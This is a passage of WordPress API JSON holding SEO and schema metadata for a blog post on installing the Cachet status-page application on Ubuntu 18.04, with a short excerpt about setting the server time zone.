Naik\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"caption\":\"Prasad Naik\"},\"sameAs\":[\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\"],\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/author\\\/prasad-naik\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cachet install on Ubuntu 18.04 - Aarvi Server Solutions","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/","og_locale":"en_US","og_type":"article","og_title":"Cachet install on Ubuntu 18.04 - Aarvi Server Solutions","og_description":"Had an opportunity an Operation Notification open source application callled Cachet Below are the steps I used to successfully complete it and get it working SSH to Ubuntu server Set up right time on server using root@status:~# sudo dpkg-reconfigure tzdata Current default time zone: \u2018America\/Chicago\u2019 Local time is now: \u00a0 \u00a0 \u00a0Mon Feb 22 10:48:44 [&hellip;]","og_url":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/","og_site_name":"Aarvi Server Solutions","article_published_time":"2022-01-01T20:31:11+00:00","article_modified_time":"2022-12-04T17:21:15+00:00","author":"Prasad Naik","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Prasad Naik","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#article","isPartOf":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/"},"author":{"name":"Prasad Naik","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/person\/c80edf3cd17550fb03e57e42f107261e"},"headline":"Cachet install on Ubuntu 18.04","datePublished":"2022-01-01T20:31:11+00:00","dateModified":"2022-12-04T17:21:15+00:00","mainEntityOfPage":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/"},"wordCount":1348,"publisher":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#primaryimage"},"thumbnailUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/cachet-install-on-ubuntu-18-04_2479.jpg","articleSection":["Linux","Script"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/","url":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/","name":"Cachet install on Ubuntu 18.04 - Aarvi Server Solutions","isPartOf":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#website"},"primaryImageOfPage":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#primaryimage"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#primaryimage"},"thumbnailUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/cachet-install-on-ubuntu-18-04_2479.jpg","datePublished":"2022-01-01T20:31:11+00:00","dateModified":"2022-12-04T17:21:15+00:00","breadcrumb":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#primaryimage","url":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/cachet-install-on-ubuntu-18-04_2479.jpg","contentUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/cachet-install-on-ubuntu-18-04_2479.jpg","width":800,"height":600},{"@type":"BreadcrumbList","@id":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/aarviserversolutions.co.in\/wps\/"},{"@type":"ListItem","position":2,"name":"Cachet install on Ubuntu 18.04"}]},{"@type":"WebSite","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#website","url":"https:\/\/aarviserversolutions.co.in\/wps\/","name":"Aarvi Server Solutions","description":"cpanel server management","publisher":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/aarviserversolutions.co.in\/wps\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization","name":"Aarvi Server Solutions","url":"https:\/\/aarviserversolutions.co.in\/wps\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/logo\/image\/","url":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2021\/07\/aarvi-logo-2.png","contentUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2021\/07\/aarvi-logo-2.png","width":1016,"height":264,"caption":"Aarvi Server Solutions"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/person\/c80edf3cd17550fb03e57e42f107261e","name":"Prasad Naik","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","caption":"Prasad Naik"},"sameAs":["https:\/\/aarviserversolutions.co.in\/wps"],"url":"https:\/\/aarviserversolutions.co.in\/wps\/author\/prasad-naik\/"}]}},"_links":{"self":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts\/2479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/comments?post=2479"}],"version-history":[{"count":1,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts\/2479\/revisions"}],"predecessor-version":[{"id":6603,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts\/2479\/revisions\/6603"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/media\/7535"}],"wp:attachment":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/media?parent=2479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/categories?post=2479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/tags?post=2479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}